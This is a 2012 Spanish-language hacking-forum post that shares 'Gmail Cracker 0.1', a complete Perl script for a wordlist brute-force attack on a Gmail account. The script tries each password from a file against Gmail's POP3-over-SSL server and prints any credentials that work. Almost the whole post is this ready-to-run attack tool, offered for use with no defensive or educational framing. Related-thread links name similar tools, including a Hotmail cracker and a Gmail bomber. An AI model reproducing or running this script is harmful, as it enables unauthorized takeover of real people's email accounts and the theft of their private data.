elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
29 Mayo 2012, 09:18  


Tema destacado: Últimos eventos sobre seguridad/inseguridad

+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting (Moderadores: Novlucker, Leo Gutiérrez., EleKtro H@cker)
| | |-+  [Perl] Gmail Cracker 0.1
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Perl] Gmail Cracker 0.1  (Leído 339 veces)
Doddy

Desconectado Desconectado

Mensajes: 220



Ver Perfil
[Perl] Gmail Cracker 0.1
« en: 1 Febrero 2012, 19:25 »

Un simple programa para crackear una cuenta Gmail.

Código
#Gmail Cracker 0.1
#Coded By Doddy H
#http://search.cpan.org/~sdowd/Mail-POP3Client-2.18/POP3Client.pm
#http://search.cpan.org/~sullr/IO-Socket-SSL-1.54/SSL.pm
#ppm install http://www.open.com.au/radiator/free-downloads/Net-SSLeay.ppd
 
use Mail::POP3Client;
use IO::Socket::SSL;
 
head();
 
if($ARGV[0] and $ARGV[1]) {
crackgmail($ARGV[0],$ARGV[1]);
} else {
print "\n[+] Sintax : $0 <email> <wordlist>\n";
}
 
copyright();
 
sub crackgmail {
 
my($user,$wordlist) = @_ ;
 
unless(-f $wordlist) {
print "\n[-] Wordlist not found\n";
copyright();
}
 
print "\n[+] Loading wordlist\n";
 
open(FILE,$wordlist);
my @passwords = <FILE>;
close FILE;
 
print "\n[+] Words Found : ".int(@passwords)."\n";
print "\n[+] Cracking...\n\n";
 
for my $pass(@passwords) {
chomp $pass;
 
my $so = IO::Socket::SSL->new(PeerAddr=>"pop.gmail.com",PeerPort => 995,Proto => "tcp");
 
my $nave = Mail::POP3Client->new();
 
$nave->User($user);
$nave->Pass($pass);
$nave->Socket($so);
 
if ($nave->Connect()) {
print "\a\a\n[+] Email : $user\n";
print "[+] Password : $pass\n";
$so->close();
$nave->close();
copyright();
}
$so->close();
$nave->close();
}
 
print "\n[+] Password not found\n";
 
}
 
sub head {
print "\n\n-- == Gmail Cracker == --\n\n";
}
 
sub copyright {
print "\n\n(C) Doddy Hackman 2012\n\n";
exit(1);
}
 
# The End ?
 


En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Perl] Pass Cracker By Doddy H
Scripting
Doddy 0 118 Último mensaje 8 Octubre 2011, 16:56
por Doddy
[Perl] Hotmail Cracker 0.1
Scripting
Doddy 0 181 Último mensaje 1 Febrero 2012, 19:24
por Doddy
[Perl] Gmail Bomber 0.3
Scripting
Doddy 0 194 Último mensaje 23 Febrero 2012, 17:39
por Doddy
[Perl] Gmail Inbox 0.1
Scripting
Doddy 0 66 Último mensaje 28 Abril 2012, 16:50
por Doddy
[Perl Tk] Gmail Inbox 0.1
Scripting
Doddy 1 136 Último mensaje 29 Abril 2012, 05:04
por EleKtro H@cker
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines